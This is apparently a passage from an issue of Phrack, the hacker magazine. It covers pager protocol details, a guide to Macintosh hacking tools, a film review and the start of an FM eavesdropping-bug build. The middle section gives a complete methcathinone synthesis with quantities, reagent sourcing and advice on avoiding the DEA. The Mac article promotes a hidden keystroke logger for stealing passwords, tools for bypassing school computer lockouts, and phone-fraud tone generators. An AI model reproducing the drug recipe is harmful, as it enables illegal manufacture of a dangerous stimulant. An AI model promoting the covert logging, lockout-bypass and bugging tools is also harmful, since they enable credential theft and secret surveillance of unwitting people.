combinations of values of bits 20 and 21 ( the source-identifier bits). Bits 22 through 31 are the parity check bits, and bit 32 is the even parity bit. BIT 20 BIT 21 Address 1 0 0 Address 2 0 1 Address 3 1 0 Address 4 1 1 Pre-coded into the code plug are three bits which designate the frame location, within each batch, at which the pager's address is to be received; the decoder will look at the codewords in this frame for its address. Power is removed from the receiver during all frames other than the precoded one, thus extending pager battery life. -CODE CAPACITY The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres s bits are the most-significant bits. -MESSAGE CODEWORD STRUCTURE A message codeword structure always start with a 1 in bit 1 and always follows directly after the address. Each message codeword replaces an address codeword in the batch. -IDLE CODEWORD STRUCTURE The idle codeword is unique, reserved codeword used to talk place of an address in any frame that would not otherwise be filled with 64 bits. Thus, if a frame contains only an address, an idle codeword comprises the 32 bits: 01111010100010011100000110010111 -POCSAG CHARACTERS CHAR HEX | CHAR HEX | CHAR HEX | | | | # 23 | $ 24 | @ 40 | [ 5B | \ 5C | ] 5D | ^ 5E | _ 5F | ' 60 | { 7B | | 7C | } 7D | ~ 7E | DEL 7F | SP 20 | ------------------------------------------------------------------------------ MACINTOSH HACKING by Logik Bomb "My fellow astronauts..." -Dan Quayle Now, two people have mailed Erik Bloodaxe asking about Macintosh hacking particularly war dialers, and each time he insulted Macs and tried to get someone to write a file on it. No one has done it. So I guess I have to. First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the originators of the Apple and the Macintosh were busted for phreaking in college. The Apple IIe was used almost universally by hackers. So why has the Mac fallen out of favor for hacking? Simple. Because it fell out of favor for everything else. Apple screwed up and wouldn't let clone makers license the MacOS. As a result, 80% of personal computers run DOS, and Macintoshes are left in the minority. Second, DOS compatible users, and hackers in particular, have an image of Mac users as a bunch of whiny lamers who paid too much for a computer and as a result are constantly defensive. The solution to this impression is to not be an asshole. I know it drives every Mac user crazy when he reads some article about Windows 95's brand new, advanced features such as "plug-and-play" that the Macintosh has had since 1984. But just try and take it. If it's any consolation, a lot of IBM-compatible (a huge misnomer, by the way) users hate Windows too. Now, on with the software. ------------------------- Assault Dialer 1.5 Assault Dialer, by Crush Commando, is the premier Mac war dialer, the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we have right now. It is the successor to a previous war dialer known as Holy War Dialer 2.0. The only real competitor I've heard of for Assault Dialer is Tyrxis Shockwave 2.0, but the only version I could get a hold of was 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right now. MacPGP 2.6.2 and PGPfone 1.0b4 MacPGP is the Macintosh port of the infamous PGP (Pretty Good Privacy.) This file is not about cryptography, so if you want to know about PGP read the fuckin' read me and docs that come with the file. Strangely enough, however, Phil Zimmerman released PGPfone, a utility for encrypting your phone and making it a secure line, for the Mac _first._ I don't know why, and I haven't had a chance to test it, but the idea's pretty cool. If PGP doesn't get Zimmerman thrown in jail, this will. DisEase 1.0 and DisEase 3.0 Schools and concerned parents have always had a problem. Schools can't have students deleting the hard drive, and parents don't want their kids looking at the kinky pictures they downloaded. So Apple came out with At Ease, an operating system that runs over System 7, sort of the same way Windows runs off of DOS. However, I can't stand At Ease. Everything about it, from the Fisher-Price screen to the interface drives me crazy. It drives a lot of other people crazy too. So it was just a matter of time before someone made a program to override it. The first was DisEase 1.0, a small program by someone calling himself Omletman, that would override At Ease if you put in a floppy loaded with it and clicked six times. Omletman improved this design and eventually released 3.0. (I haven't been able to find any evidence that a 2.0 was ever released) 3.0 has such cool features as reading the preferences file to give you the password, so you can change the obnoxious greeting teachers always put to something more sinister. The only problem with 3.0 is that some configurations of At Ease only let documents be read off of disks; no applications, which means DisEase 3.0 won't appear, and so you can't run it. However, with 1.0 you don't have to actually open the application, you just click six times, so if you use 1.0 to get to the finder, and then 3.0 to read the passwords, things will work. Invisible Oasis Installer Oasis is a keystroke recorder, so you can find out passwords. However, with the original Oasis, you had to put it in the Extensions folder and make it invisible with ResEdit, which takes a while. Invisible Oasis Installer, however, installs it where it should be and automatically makes it invisible. "So everything's wrapped up in a nice neat little _package_, then?" -Homer Simpson Anonymity 2.0 and Repersonalize 1.0 Anonymity, version 1.2, was a rather old program whose author has long been forgotten that was the best data fork alterer available. It removed the personalization to programs. However, in around 1990 someone named the Doctor made 2.0, a version with some improvements. Repersonalize was made in 1988 (God, Mac hacking programs are old) which reset personalization on some of the Microsoft and Claris programs, so you could enter a different personalization name. I don't know if it will still work on Microsoft Word 6.0.1 and versions of programs released recently, but I don't really care because I use Word 5.1a and I'm probably not going to upgrade for a while. Phoney (AKA Phoney4Mac) Phoney is an excellent program that emulates the Blue Box, Red Box, Black Box and Green Box tones. There is also Phoney4Newton, which does the same thing on the most portable of computers, the Newton. That's all I'm covering in this file as far as Mac hacking programs. You'll probably want to know where to find all this crap, so here are all of the Mac hacking ftp and Web sites I know of: Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html) This site, run by Space Rogue is L0pht Heavy Industries' Mac site. It is probably the largest and best archive of Mac hacking software connected to the Internet. The problem with this is that it can't handle more than two anonymous users, meaning that unless you pay to be part of L0pht, you will never get into this archive. I've tried getting up at 4:30 AM, thinking that no one in their right mind would possibly be awake at this time, but there is always, somehow, somewhere, two people in Iceland or Singapore or somewhere on this site. The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html) This site does not look like much, and it is fairly obvious that its maintainer, Sean Warren, is still learning HTML, but it is reliable and is a good archive. It is still growing, probably due to the fact that it is one of the only Internet Mac hacking sites anyone can get to and upload. Kn0wledge Phreak (http://www.uccs.edu/~abusby/k0p.html) This is an excellent site and has many good programs. There is one catch, however. It's maintainer, Ole Buzzard, is actually getting the files from his BBS. So many of the really good files are locked away in the k0p BBS, and those of us who can't pay long distance can't get the files. Oh well. Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page (http://www.lib.iup.edu/~seaman/index.html) While this is hardly a Macintosh hacking site, it's just a hacking site, it does have very few Mac files, some of which are hard to get to. However, Bone might get expelled because of a long story involving AOHell, so this page might not be here. Then again, maybe Bone won't get expelled and this site will stay. Never can tell 'bout the future, can you? "We predict the future. We invent it." -Nasty government guy on the season premiere of _The X-Files_ Andy Ryder Netsurfer and Road Warrior on the Info Highway I've pestered Bruce Sterling _and_ R.U. Sirius! As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) Once scored 29,013,920 points on Missile Command "This Snow Crash thing- is it a virus, a drug, or a religion?" -Hiro Protagonist "What's the difference?" -Juanita Marquez "...one person's 'cyberpunk' is another's everyday obnoxious teenager with some technical skill thrown in..." -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" "More than _some_ technical skill." -Andy Ryder ------------------------------------------------------------------------------ Making Methcathinone Compiled by Anonymous Ok, this has got to be the easiest drug made at home (by far). This is very similar to methamphetamine in structure, effect, and use. Typical doses start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add 10 mg) or through mucous membranes (nasally). Ingredients: Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) Conc. Sulfuric acid - it's up to you where you get this. Contact me if you need help locating it. Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it is used for cleaning concrete. Sodium Hydroxide - Hardware stores. AKA lye. Toluene - Hardware store, paint store. Lab equipment: 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00) 125 mL separatory funnel - same as above glass tubing - same as above Buchner funnel - This is a hard to find item, but must schools have at least one. They are usually white porcelain or plastic. They look like a funnel with a flat disk in the bottom with lots of holes in it. If you need one, arrangements can be made. Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00 References to Edmund's Scientific Co, in NJ, are accurate. You have to go to their "Lab Surplus/Mad Scientist" room. The prices are incredible. This place is definitely a recommended stopping sight for anybody going through New Jersey. It is located in "Barrington", about 30 minutes from center city Philadelphia. All of the above can be purchased from "The Al-Chymist". Their number is (619)948-4150. Their address is: 17525 Alder #49 Hesperia, Ca 92345 Call and ask for a catalog. That's it. The body of this article is stolen from the third edition of "Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried and proven method by many people. If you want a copy of this book, contact me. Good luck and keep away from the DEA M E T H C A T H I N O N E K I T C H E N I M P R O V I E S E D C R A N K The latest designer variant upon the amphetamine molecule to gain popularity and publicity is methcathinone, commonly called cat. This substance is remarkably similar to the active ingredient found in the leaves of the khat tree which the loyal drug warriors on the network news blame for turning peace loving Somalis into murderous psychopaths. The active ingredient in the khat leaves is cathinone, which has the same structural relationship to methcathinone that amphetamine has to methamphetamine. It is made by oxidizing ephedrine, while meth can be made by reducing ephedrine. The high produced by methcathinone is in many ways similar to methamphetamine. For something so easily made and purified, it is actually quite enjoyable. the main differences between the meth high and the methcathinone high are length of action and body fell. With methcathinone, one can expect to still get to sleep about 8 hours after a large dose. On the down side, it definitely gives me the impression that the substance raises the blood pressure quite markedly. This drug may not be safe for people with weak hearts of blood vessels. Be warned! Cat is best made using chrome in the +6 oxidation state as the oxidizer. I recall seeing an article in the narco swine's Journal of Forensic Science bragging about how they worked out a method for making it using permanganate, but that method gives an impure product in low yields. Any of the common hexavalent chrome salts can be used as the oxidizer in this reaction. This list include chrome trioxide (CrO3), sodium or potassium chromate (Na2CrO4), and sodium or potassium dichromate (Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is used in great quantities in chrome plating. The chromates are used in tanning and leather making. To make methcathinone, the chemist starts with the water extract of ephedrine pills. The concentration of the reactants in this case is not critically important, so it is most convenient to use the water extract of the pills directly after filtering without any boiling away of the water. See the section at the beginning of Chapter 15 [I included this at the end of the file] on extracting ephedrine form pills. Both ephedrine hydrochloride and sulfate can be used in this reaction. The water extract of 1000 ephedrine pills is placed into any convenient glass container. A large measuring cup is probably best since it has a pouring lip. Next, 75 grams of any of the above mentioned +6 chrome compounds are added. They dissolve quite easily to form a reddish or orange colored solution. Finally, concentrated sulfuric acid is added. If CrO3 is being used, 21 mL is enough for the job. If one of the chromates is being used, 42 mL is called for. These ingredients are thoroughly mixed together, and allowed to sit for several hours with occasional stirring. After several hours have passed, lye solution is added to the batch until it is strongly basic. Very strong stirring accompanies this process to ensure that the cat is converted to the free base. Next, the batch is poured into a sep funnel, and a couple hundred mLs of toluene is added. Vigorous shaking, as usual, extracts the cat into the toluene layer. It should be clear to pale yellow in color. The water layer should be orange mixed with green. The green may settle out as a heavy sludge. The water layer is thrown away, and the toluene layer containing the cat is washed once with water, then poured into a beaker. Dry HCl gas is passed through the toluene as described in Chapter 5 [I included this at the end of the file] to get white crystals of cat. The yield is between 15 and 20 grams. This reaction is scaled up quite easily. CHAPTER 15 (part of it anyway) P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E F R O M S T I M U L A N T P I L L S In the present chemical supply environment, the best routes for making meth start with ephedrine as the raw material. To use these routes, a serious hurdle must first be overcome. This hurdle is the fact that the most easily obtained source of ephedrine, the so-called stimulant or bronchodilator pills available cheaply by mail order, are a far cry from the pure starting material a quality minded chemist craves. Luckily, there is a simple and very low profile method for separating the fillers in these pills from the desired active ingredient they contain. A superficial paging through many popular magazines[New Body is where I found it at GNC] reveals them to be brim full of ads from mail order outfits offering for sale "stimulant" or "bronchodilator" pills. These are the raw materials today's clandestine operator requires to manufacture meth without detection. The crank maker can hide amongst the huge herd of people who order these pills for the irritating and nauseating high that can be had by eating them as is. I have heard of a few cases where search warrants were obtained against people who ordered very large numbers of these pills, but I would think that orders of up to a few thousand pills would pass unnoticed. If larger numbers are required, maybe one's friends could join in the effort. The first thing one notices when scanning these ads is the large variety of pills offered for sale. When one's purpose is to convert them into methamphetamine, it is very easy to eliminate most of the pills offered for sale. Colored pills are automatically rejected because one does not want the coloring to be carried into the product. Similarly, capsules are rejected because individually cutting open capsules is just too much work. Bulky pills are to be avoided because they contain too much filler. The correct choice is white cross thins, preferably containing ephedrine HCl instead of sulfate, because the HCl salt can be used in more of the reduction routes than can the sulfate. Once the desired supply of pills is in hand, the first thing which should be done is to weigh them. This will give the manufacturer an idea of how much of the pills is filler, and how much is active ingredient. Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle contains 25 grams of active ingredient. A good brand of white cross thins will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl may not sound like much, but if it is all recovered from these pills, it is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three or four thousand dollars, not a bad return on the twenty odd dollars a thousand lot of such pills costs. [I don't know where he got 3 or 4 thousand dollars from, but the pills go for about $35.00/1000 now. 2 months ago they were $25.00 but now they have to do more paper work because it is a DEA controlled substance] To extract the ephedrine from the pills, the first thing which must be done is to grind them into a fine powder. This pulverization must be thorough in order to ensure complete extraction of the ephedrine form the filler matrix in which it is bound. A blender does a fine job of this procedure, as will certain brands of home coffee grinders. Next, the powder from 1000 pills is put into a glass beaker, or other similar container having a pouring lip, and about 300 mL of distilled water is added. Gentle heat is then applied to the beaker, as for example on a stove burner, and with steady stirring the contents of the beaker are slowly brought up to a gentle boil. It is necessary to stir constantly because of the fillers will settle to the bottom of the beaker and cause burning if not steadily stirred. Once the contents of the beaker have been brought to a boil, it is removed from the heat and allowed to settle. Then the water is poured out of the beaker through a piece of filter paper. The filtered water should be absolutely clear. Next, another 50 mL of water is added to the pill filler sludge, and it too is heated with stirring. Finally, the pill sludge is poured into the filter, and the water it contains is allowed to filter through. It too should be absolutely clear, and should be mixed in with the first extract. A little water may be poured over the top of the filler sludge to get the last of the ephedrine out of it. This sludge should be nearly tasteless, and gritty in texture. The water extract should taste very bitter, as it contains the ephedrine. The filtered water is now returned to the stove burner, and half of the water it contains is gently boiled away. Once this much water has been boiled off, precautions should be taken to avoid burning the ephedrine. The best alternative is to evaporate the water off under a vacuum. If this is not practical with the equipment on hand, the water may be poured into a glass baking dish. This dish is then put into the oven with the door cracked open, and the lowest heat applied. In no time at all, dry crystals of ephedrine HCl can be scraped out of the baking dish with a razor blade. The serious kitchen experimenter may wish to further dry them in a microwave. Chapter 5 (The part about the HCl gas) A source of anhydrous hydrogen chloride gas is now needed. The chemist will generate his own. The glassware is set up as in Figure 1. He will have to bend another piece of glass tubing to the shape shown. It should start out about 18 inches long. One end of it should be pushed through a one hole stopper. A 125 mL sep funnel is the best size. The stoppers and joints must be tight, since pressure must develop inside this flask to force the hydrogen chloride gas out through the tubing as it is generated. Into the 1000 mL, three-necked flask is placed 200 grams of table salt. Then 25% concentrated hydrochloric acid is added to this flask until it reaches the level shown in the figure. The hydrochloric acid must be of laboratory grade [I use regular muriatic acid for pools]. Figure 1: \ / \ /ķ ֽ ӷ <--125 mL separatory funnel ӷ ֽ ķ Ľ glass tubing Ŀ ӷ ֽ  ͻ stopcock->ۺĴ Salt and Hydrochloric acid stopper ->ķ \/з ķ <-1 hole mixed into a paste by add- ĺ ĺ stopper ing HCL to salt and mixing. Ľ Ľ Ľ ķ The surface should be rough ֽ ӷ and a good number of holes should be poked into the 1000 mL, 3 neck flask paste for long lasting generation of HCl gas. ӷ acid/salt level ֽ ķ Ľ ķ Ľ ķ Ľ Ľ Some concentrated sulfuric acid (96-98%) is put into the sep funnel and the spigot turned so that 1 mL of concentrated sulfuric acid flows into the flask. It dehydrates the hydrochloric acid and produces hydrogen chloride gas. This gas is then forced by pressure through the glass tubing. One of the Erlenmeyer flasks containing methamphetamine in solvent is placed so that the glass tubing extends into the methamphetamine, almost reaching the bottom of the flask. Dripping in more sulfuric acid as needed keeps the flow of gas going to the methamphetamine. If the flow if gas is not maintained, the methamphetamine may solidify inside the glass tubing, plugging it up. Within a minute of bubbling, white crystals begin to appear in the solution, More and more of them appear as the process continues. It is an awe-inspiring sight. In a few minutes, the solution becomes as thick as watery oatmeal. It is now time to filter out the crystals, which is a two man job. The flask with the crystals in it is removed from the HCl source and temporarily set aside. The three-necked flask is swirled a little to spread around the sulfuric acid and then the other Erlenmeyer flask is subjected to a bubbling with HCl. While this flask is being bubbled, the crystals already in the other flask are filtered out. The filtering flask and Buchner funnel are set up as shown in figure 2. The drain stem of the buchner funnel extends all the way through the rubber stopper, because methamphetamine has a nasty tendency to dissolve rubber stoppers. This would color the product black. A piece of filter paper covers the flat bottom of the Buchner funnel. The vacuum is turned on and the hose attached to the vacuum nipple. Then the crystals are poured into the Buchner funnel. The solvent and uncrystallized methamphetamine pass through the filter paper and the crystals stay in the Buchner funnel as a solid cake. About 15 mL of solvent is poured into the Erlenmeyer flask. the top of the flask is covered with the palm and it is shaken to suspend the crystals left clinging to the sides. This is also poured into the Buchner funnel. Finally, another 15 mL of solvent is poured over the top of the filter cake. Figure 2: Ŀ <-Bchner Funnel ___________ \ / \ / \ / Ŀ <--To vacuum Ŀ Ŀ Filtering flask--> Now the vacuum hose is disconnected and the Buchner funnel, stopper and all, is pulled from the filtering flask. All of the filtered solvent is poured back into the erlenmeyer flask it came from. It is returned to the HCl source for more bubbling. The Buchner funnel is put back into the top of the filtering flask. It still contains the filter cake of methamphetamine crystals. It will now be dried out a little bit. The vacuum is turned back on, the vacuum hose is attached to the filtering flask, and the top of the Buchner funnel is covered with the palm or section of latex rubber glove. The vacuum builds and removes most of the solvent from the filter cake. This takes about 60 seconds. The filter cake can now be dumped out onto a glass or China plate (not plastic) by tipping the Buchner funnel upside-down and tapping it gently on the plate. And so, the filtering process continues, one flask being filtered while the other one is being bubbled with HCl. Solvent is added to the Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each flask has been bubbled for about seven times, no more crystal will come out and the underground chemist is finished. If ether was used as the solvent, the filter cakes on the plates will be nearly dry now. With a knife from the silverware drawer, the cakes are cut into eighths. They are allowed to dry out some more then chopped up into powder. If benzene was used, this process takes longer. Heat lamps may be used to speed up this drying, but no stronger heat source. [The above section of chapter 5 is talking about methamphetamine. You could, in most instances, substitute the word methcathinone, but I wanted to present the text to you in its exact form.] ------------------------------------------------------------------------------ Review of "HACKERS" By Wile Coyote Sorry, it might be a little long... cut it to ribbons if you want, most of it is just a rant anyway... Hope you enjoy it. First off, I have to admit that I was biased going into the movie "Hackers"... I heard that it wasn't going to be up to snuff, but did I let that stop me? No, of course not... I sucked up enough courage to stride towards my girlfriend and beg for seven bucks... :) She ended up wanting to see the movie herself (and sadly, she rather enjoyed it... oh, well, what can you do with the computer illiterate or is it the computer illegitimate?). Now onto.... THE MOVIE (Yes, I AM going to give you a second-by-second playback of the movie... you don't want me to spoil the plot, you say? Well, don't worry, there is no plot to spoil! :) just kidding, go see it... maybe you'll like it...) Well, from the very first few seconds, I was unimpressed... It begins with an FBI raid on some unsuspecting loose (who turns out to be the main character, but that's later) named Zero Cool (can you say "EL1EEEEET WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey, cinematography counts!) But, the acting was worse. The Feds bust into this home and run up the stairs, all while this lady (the mom) just kind of looks on dumbfounded and keeps saying stuff like "hey, stop that...", or something (is this what a raid is like? I've never had the pleasure...) Ok, so the story goes on like this: The 11 year old kid made a computer virus that he uploads to, I think, the NY stock exchange, and it crashes 1,507 computers. There is a really lame court scene where the kid is sentenced to 7 years probation where he can't use a computer or a touch-tone phone... That was 1988... Time passes... Now it's 1995, and boy have things changed (except the mom... hmmm....). Now the ex-hacker is allowed to use a computer (his 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) boxing some TV station to change the program on television (yes, I know that all of you super-el33t hackers hack into TV stations when you don't like what's on Ricki Lake!). N-e-way, while hacking into their super-funky system (the screen just kind of has numbers moving up and down the screen like some kind of hex-editor on acid...) he gets into a "hacking battle" with some other hacker called Acid Burn (I don't think I have ever seen such a trippy view of the "Internet"... lots of Very high-end graphics, not very realistic, but it's Hollywood...). In the end, the other hacker kicks the shit out of him (he has changed his handle to Crash Override now, just to be cool, i guess) and logs him off the TV station. Wow, tense... cough... For those of you who care, let me describe the "hacker" Crash Override: He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is (kinda) built, and wears VERY wicky (wicky : weird plus wacky) clothes, and the CDC might have quite a bit to say about the amount of leather he wears... I mean, there are limits to that kind of stuff, man! And to top off his coolness, he is, like, the roller-blade king of the world. (Not that hackers don't roller-blade, but he does it just Soooo much cooler than I could... :) ). And yet, here's the nifty part, despite all of his deft coolness, he couldn't get a girl for the life of him (we all morn for him in silent prayer). Ok, so now Crash is at school, and he meets Wonderchick (who is EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to spoil the suspense). Now, while at school, he wants to hook up with wonderchick, so he breaks into the school's computer (it must be a fucking Cray to support all of the high-end-type graphics that this dude is pulling up) and gets his English(?) class changed to hers. So, some other super-d00dcool hacker spots him playing around with the schools computer (it's funny how may elite hackers one can meet in a new york public school...), so he catches up with Crash and invites you to an elite (Oh, if you ever want to see a movie where the word 3l333333333t is used, like a fucking million times, then go see Hackers...) hackerz-only club, complete with million-dollar virtual-reality crap and even a token phreaker trying to red-box a pay-phone with a cassette recorder (never mind that the music is about 197 decibels, the phone can still pick up the box tones...). What follows is that Crash meets up with some seriously k-rad hackers (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and Phantom Phreak : who reminds of that gay kid on "my so called life... maybe that was him?";Lord Nikon : the token black hacker... Photographic memory is his super-power). They talk about k00l pseudo-hacker shit and then a l00ser warez-type guy comes up and tries to be El33t like everybody else. He is just about the ONLY realistic character in the whole movie. He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps saying "I need a handle, then I'll be el33t!". (Why he can't just pick his own handle, like The Avenging Turd or something, is beyond me... He plays lamer better than the kids in Might Morphin Power Rangers... awesome actor!). N-e-way, this is where the major discrepancies start. Ok, first they try to "test" Lamerboy by asking him what the four most used passwords are. According to the movie, they are "love, sex, god, and secret". (Hmmmm.... I thought Unix required a 6-8 char. password....). Somehow lamerboy got into a bank and screwed with an ATM machine four states away; all of the hacker chastise him for being stupid and hacking at home (If you watch the movie, you'll notice that the hackers use just about every pay-phone in the city to do their hacking, no, THAT doesn't look suspicious)Next they talk about "hacking a Gibson". (I was informed that they WANTED to use "hacking a Cray", but the Cray people decided that they didn't want THAT kind of publicity. I've never heard of a Gibson in real life, though...). They talk about how k-powerful the security is on a Gibson, and they say that if Lamerboy can crack one, then he gets to be elite. Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy finally cracks a Gibson with the password God (never mind a Login name or anything that cool). Then the cheese begins in full force. The Gibson is like a total virtual-reality thingy. Complete with all sorts of cool looking towers and neon lightning bolts and stuff. Lamerboy hacks into a garbage file (did I mention that the entire world is populated by Macs? Oh, I didn't... well, hold on :)...). So, this sets alarms off all over the place (cause a top-secret file is hidden in the garbage, see?), and the main bad-guy, security chief Weasel, heads out to catch him. He plays around with some neon, star-trek-console, buttons for a while, then calls the "feds" to put a trace on the kid. La de da, ess catches him in a second, and the kid only gets half of the file, which he hides. (to spoil the suspense, yet again, the file is some kind of money getting program, like the kind some LOD members wrote about a long time ago in Phrack, which pulls money from each transaction and puts it into a different account. Needless to say, the Security Weasel is the guy who wrote it, which is why he needs it back, pronto!). As we travel along the movie, the hackers keep getting busted for tapping into the Gibson, and they keep getting away. The "action" heats up when Wonderchick and Crash get into a tiff and they decide to have a hacking contest... They go all over the city trying their best to fuck with the one fed they don't like.... Brilliant move, eh? The movie kind of reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop. They all fondle over the machine with the same intensity that Captain Kirk gave to fighting Klingons, and frankly, their acting abilities seems to ask "please deposit thirty-five cents for the next three minutes". It was funny listening to the actors, 'cause they didn't know shit about what they were saying... Here's a clip: Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not Kbps, mind you :)...I wonder where they designed a .8 of a bit?) Yeah! Cool... Hey what kind of chip does it have in it? A P6! Three times faster than a Pentium.... Yep, RISC is the wave of the future... (I laughed so hard..... Ok, first of all, it is a Mac. Trust me, it has the little apple on the cover. Second it has a P6, what server she ripped this out of, I dare not ask. How she got that bastard into a laptop without causing the casing to begin melting is yet another problem... those get very hot, i just read about them in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6, because it has RISC coding.... I kinda wished I had stayed for the credits to see the line: Technical advisor None.... died on route to work...) Finally they ask something about the screen, and they find out it is an..... hold your breath.... ACTIVE MATRIX! ... Kick ass! They do lots of nifty things with their magic laptops (I noticed that they ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say you can't hack on a mac, 'cause really you can hack on a TI-81 if you've got the know.... but please, not EVERYONE in the fucking movie has to have the exact same computer (different colors, though... there was a really cool clear one).... it got really sad at the end), and they finally find out what the garbage file that Lamerboy stole was, this time using a hex editor/CAD program of some sort. As we reach the end of the movie, the hackers enlist the help of two very strangely painted phone phreaks who give the advice to the hackers to send a message to all of the hackers on the 'net, and together, they all kicked some serious ass with the super-nifty-virtual-reality Gibson. In the end, all of the Hackers get caught except for one, who pirates all of the TV station in the world and gives the police the "real" story... So, the police politely let them go, no need for actually proving that the evidence was real or anything, of course. So, in the end, I had to say that the movie was very lacking. It seemed to be more of a Hollywood-type flashy movie, than an actual documentary about hackers. Yes, I know an ACTUAL movie about hacker would suck, but PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It may have sucked less if they didn't put flashing, 64 million color, fully-rendered, magically delicious pictures floating all over the screen instead of just a simple "# " prompt at the bottom. With all of the super-easy access to all of the worlds computers, as depicted in the movie, ANYBODY can be a hacker, regardless of knowledge, commitment, or just plain common sense. And that's what really made it suck... Hope you enjoyed my review of HACKERS! ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 4 of 18 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ +===================================+ | CONSTRUCTING AN FM BUG | | -------------------- | | | | written by | | + Obi-1 | | * edjjs@cc.newcastle.edu.au| | * * | | | | $ Written for Phrack | | x$x if any other magazine | | $ wishes to print this | | x$x article they must let the | | author know in advance | +===================================+ INTRODUCTION Before anything this article sole purpose is to teach everyone out there about electronics. If you do build it use it at your own risk. You will need a decent knowledge of electronics and how to solder some components. So if you dont know how to build electronic kits and want a bug you can buy one ready-made from me, just write to the e-mail address above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is like a tiny microphone that can transmit crystal clear audio to a near by Walkman/stereo etc. The range of the bug we are making is about 800 meters, and the battery life is about 100hrs on a normal alkaline battery. This bug however is not to be moved while in use, so you cant put it in your pocket and walk around. There are other bugs on the market but this I found to be the most reliable and relatively easy to build. The actual size of the PCB is only 2cm X 2cm! However the battery is actually the biggest component. Some parts like the Surface Mount resistors, air trimmer and electret microphone maybe hard to find. I find mail-order catalogs are the best source of parts as they have a bigger range than a store like Dick Smith. I did not actually design this circuit, Talking Electronics did, but felt everyone out there might like to know how to build one of these. The surface mount resistors can be replaced with normal resistors but I recommend using the surface mount resistors as they give more of an educational experience to this project If you dont have a clue how to build a bug and have no knowledge of electronics whatsoever e-mail me and you can purchase one pre-built from me. COMPONENT LIST Resistors 1- 470 R surface mount 1- 10k surface mount 1- 47k surface mount 1- 68k surface mount 1- 1M surface mount Capacitors 1- 10p disc ceramic 1- 39p disc ceramic 1- 1n disc ceramic 2- 22n disc ceramics 1- 100n monoblock (monolithic) 1- Air trimmer 2p-10p Other 2- BC 547 transistors 1- 5 turn coil 0.5mm enameled wire 1- electret mic insert- high sensitivity 1- 9V battery snap 1- 15cm tinned copper wire 1- 30cm fine solder 1- 170cm antenna wire NOTE: